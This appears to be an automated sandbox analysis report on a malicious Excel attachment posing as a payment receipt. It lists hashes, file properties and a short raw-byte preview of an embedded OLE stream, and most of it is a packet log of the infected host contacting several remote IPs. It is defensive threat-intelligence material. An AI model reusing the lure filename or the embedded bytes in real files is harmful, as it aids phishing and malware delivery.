                                                      Category:dropped
                                                      Size (bytes):165
                                                      Entropy (8bit):1.4377382811115937
                                                      Encrypted:false
                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                      Malicious:false
                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):165
                                                      Entropy (8bit):1.4377382811115937
                                                      Encrypted:false
                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                      Malicious:true
                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      File type:Microsoft Excel 2007+
                                                      Entropy (8bit):7.998095740538939
                                                      TrID:
                                                      • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                                      • ZIP compressed archive (8000/1) 18.60%
                                                      File name:Comprobante de pago.xlam.xlsx
                                                      File size:675'218 bytes
                                                      MD5:3739645f289889f9008d2607eb2558e1
                                                      SHA1:d32ffac570a059cc5582e7eb4668bb34c2b3fcc7
                                                      SHA256:c43a3a0ce7d7879849045e4ff17ff6f6d74a3462bd2da91e0f0284d3768a2b96
                                                      SHA512:1d7217a9d1cf9091584d7498c3c5a725e6b31c1beefa000c6a21bf031575d4c0431caa8309355e72264b3f1f8fc67a6309e1c85a0b4998fc9aef6f18da362133
                                                      SSDEEP:12288:SUoSJ7YYHc6Ox7686f5BZe8/1Y01siVR4QylxDaOBLKmAivf8U/Fp6z:yS/86Ku/Ze8dYNqRjExD7B9Aivkuwz
                                                      TLSH:3FE4239DC19B137ED1538B271D98D46B8B46922D1503B2E03E3AC04A86B13A2EFD9D5F
                                                      File Content Preview:PK..........WY..l.....C.......[Content_Types].xmlUT...@n.g@n.g@n.g..MO.1......V..........R...D.}..$&......g..=.......3......_m.k......s9.......N<L...DC.....vb.$..?..O...au.N,JI?.".@.$c...Y......J..0Gu1.}U:.....z.....`.J3.......Ds.K..N@J.j(.W.`^Q...d..C...
                                                      Icon Hash:2562ab89a7b7bfbf
                                                      Document Type:OpenXML
                                                      Number of OLE Files:1
                                                      Has Summary Info:
                                                      Application Name:
                                                      Encrypted Document:False
                                                      Contains Word Document Stream:False
                                                      Contains Workbook/Book Stream:False
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:False
                                                      Flash Objects Count:0
                                                      Contains VBA Macros:False
                                                      Author:USER
                                                      Last Saved By:USER
                                                      Create Time:2023-08-03T11:34:29Z
                                                      Last Saved Time:2023-08-03T11:37:28Z
                                                      Creating Application:Microsoft Excel
                                                      Security:0
                                                      Thumbnail Scaling Desired:false
                                                      Company:
                                                      Contains Dirty Links:false
                                                      Shared Document:false
                                                      Changed Hyperlinks:false
                                                      Application Version:16.0300
                                                      General
                                                      Stream Path:\x1oLE10NaTive
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:936959
                                                      Entropy:5.947952790045427
                                                      Base64 Encoded:False
                                                      Data ASCII:. x . . A # v . . U . U M . O . 3 R . = ~ I . s 6 . b P B . E . . . . S . . / u d . Y . e . 5 a 6 U ! x . . 2 . . + Y D > d 5 8 Z H h x 0 l r . . - f . y . { t < * i , C p K Z r . e t M . . z v A Y # . . 4 . . ` { e 0 . . 9 T f U R o V @ _ . 1 * & > . . . . @ . P . D . 4 * . . . J = ' . 4 . X & Y V A + j . = N . E S C _ < i . : u . w _ } - . n ' = $ > 1 . . 6 . F . . . g . ( M B ) ) $ s p o " . . ` u { . F [ 1 " . . V 1 s f / ; . # O o * . . . . . _ . . . < N . F O f x E M n $ A y * $ . ] l . d u . h
                                                      Data Raw:d0 1c 78 05 03 41 de 23 76 aa 01 08 fd 9e bd be a2 d8 55 81 ed 07 e5 92 55 8b 4d 85 8b 11 bb 4f 98 b9 ff f7 d3 8b 33 52 ff d6 83 c0 3d ff e0 b9 7e 49 e6 04 73 df 36 12 62 50 fc d3 42 00 ec 45 18 e9 c7 01 00 00 53 be f7 0d be ef 1c 2f 75 64 1b a1 59 ff 04 65 2e 35 61 36 df 55 86 c0 b5 be c8 e5 a1 21 c3 fb 78 c6 94 09 32 c8 1c 0f 2b 59 44 3e 64 f9 35 38 c0 c0 9d 5a 48 99 f0 ef 68 85
                                                      General
                                                      Stream Path:uuOf24PFeUnX
                                                      CLSID:
                                                      File Type:empty
                                                      Stream Size:0
                                                      Entropy:0.0
                                                      Base64 Encoded:False
                                                      Data ASCII:
                                                      Data Raw:
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 24, 2024 08:55:53.597562075 CEST4916180192.168.2.22192.3.216.142
                                                      Oct 24, 2024 08:55:53.603353977 CEST8049161192.3.216.142192.168.2.22
                                                      Oct 24, 2024 08:55:53.603426933 CEST4916180192.168.2.22192.3.216.142
                                                      Oct 24, 2024 08:55:53.603636026 CEST4916180192.168.2.22192.3.216.142
                                                      Oct 24, 2024 08:55:53.609333992 CEST8049161192.3.216.142192.168.2.22
                                                      Oct 24, 2024 08:55:54.275895119 CEST8049161192.3.216.142192.168.2.22
                                                      Oct 24, 2024 08:55:54.275933027 CEST8049161192.3.216.142192.168.2.22
                                                      Oct 24, 2024 08:55:54.275976896 CEST4916180192.168.2.22192.3.216.142
                                                      Oct 24, 2024 08:55:54.276035070 CEST4916180192.168.2.22192.3.216.142
                                                      Oct 24, 2024 08:55:54.675770998 CEST4916280192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:54.681196928 CEST8049162188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:54.681262016 CEST4916280192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:54.681607008 CEST4916280192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:54.686950922 CEST8049162188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:55.056935072 CEST4916180192.168.2.22192.3.216.142
                                                      Oct 24, 2024 08:55:55.388847113 CEST8049162188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:55.389086008 CEST4916280192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:55.390134096 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:55.390223026 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:55.390300989 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:55.391942024 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:55.391979933 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:55.394819975 CEST8049162188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:55.394869089 CEST4916280192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.016150951 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.016422033 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.021720886 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.021732092 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.022202015 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.097908020 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.139338017 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.384901047 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.385076046 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.385160923 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.385164976 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.385234118 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.385309935 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.385333061 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.385436058 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.385489941 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.385504961 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.416762114 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.416827917 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.416877031 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.416939974 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.417020082 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.501729965 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.501876116 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.501933098 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.501949072 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.501976967 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.502033949 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.502096891 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.502271891 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.502362013 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.502432108 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.502463102 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.533802032 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.533865929 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.533925056 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.618683100 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.618767977 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.618769884 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.618839025 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.618896008 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.618912935 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.619014978 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.619107008 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.619119883 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.619462967 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.619543076 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.619604111 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.650913954 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.650979996 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.650975943 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.651043892 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.651124001 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.735568047 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.735678911 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.735747099 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.735795975 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.735816002 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.735845089 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.735903978 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.735928059 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.736510038 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.736651897 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.736713886 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.767724991 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.767857075 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.767853022 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.767924070 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.768022060 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.852725983 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.852751017 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.852896929 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.852962971 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.853022099 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.853039026 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.853724957 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.853899002 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.853961945 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.884716034 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.884851933 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.884903908 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.884903908 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.884970903 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.885003090 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.885051966 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.970072031 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.970093012 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.970156908 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.970194101 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:56.970240116 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:56.970277071 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.001874924 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.001970053 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.001966000 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.002053976 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.002099037 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.086644888 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.086723089 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.086785078 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.086843967 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.086993933 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.087009907 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.118841887 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.118921041 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.118980885 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.119044065 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.119076967 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.119215965 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.203906059 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.203917027 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.203996897 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.204072952 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.204082012 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.204121113 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.204168081 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.204175949 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.204216957 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.236112118 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.236130953 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.236201048 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.277581930 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.277602911 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.277645111 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.320730925 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.320794106 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.320828915 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.321099997 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.321175098 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.321190119 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.321557999 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.321607113 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.321619987 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.353122950 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.353198051 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.353214025 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.394582987 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.394665956 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.394681931 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.437764883 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.437836885 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.437856913 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.437901020 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.438230038 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.438244104 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.438795090 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.438854933 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.438869953 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.470061064 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.470132113 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.470146894 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.511593103 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.511658907 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.511673927 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.554981947 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.555062056 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.555077076 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.555181026 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.555253983 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.555268049 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.555510998 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.556214094 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.556227922 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.587017059 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.587102890 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.587117910 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.587534904 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.587601900 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.587615013 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.628571033 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.628634930 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.628654957 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.671798944 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.671873093 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.671888113 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.672211885 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.672261953 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.672276020 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.704008102 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.704114914 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.704128981 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.704176903 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.704245090 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.704258919 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.745438099 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.745527029 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.745542049 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.788994074 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.789088011 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.789102077 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.789592981 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.789616108 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.789652109 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.789669991 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.789689064 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.789717913 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.789741993 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.905915976 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.905953884 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.905986071 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906044960 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906078100 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906080008 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906100035 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906115055 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906119108 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906145096 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906145096 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906147957 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906291962 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906749964 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906770945 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.906810999 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906833887 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.906848907 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.907006025 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.907109022 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.907151937 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.907185078 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.907212019 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.907212019 CEST49163443192.168.2.22188.114.97.3
                                                      Oct 24, 2024 08:55:57.907228947 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:57.907279968 CEST44349163188.114.97.3192.168.2.22
                                                      Oct 24, 2024 08:55:59.732685089 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:55:59.732775927 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:55:59.732954025 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:55:59.737196922 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:55:59.737236977 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:00.610255003 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:00.610450029 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:56:00.610913038 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:00.610972881 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:56:00.614718914 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:56:00.614748001 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:00.615051985 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:00.662081957 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:56:00.703368902 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:01.024796963 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:01.144475937 CEST44349164216.58.212.174192.168.2.22
                                                      Oct 24, 2024 08:56:01.144548893 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:56:01.147762060 CEST49164443192.168.2.22216.58.212.174
                                                      Oct 24, 2024 08:56:01.159852982 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:01.159884930 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:01.159936905 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:01.160271883 CEST49165443192.168.2.22216.58.212.129
                                                      Oct 24, 2024 08:56:01.160279036 CEST44349165216.58.212.129192.168.2.22
                                                      Oct 24, 2024 08:56:02.014851093 CEST44349165216.58.212.129192.168.2.22
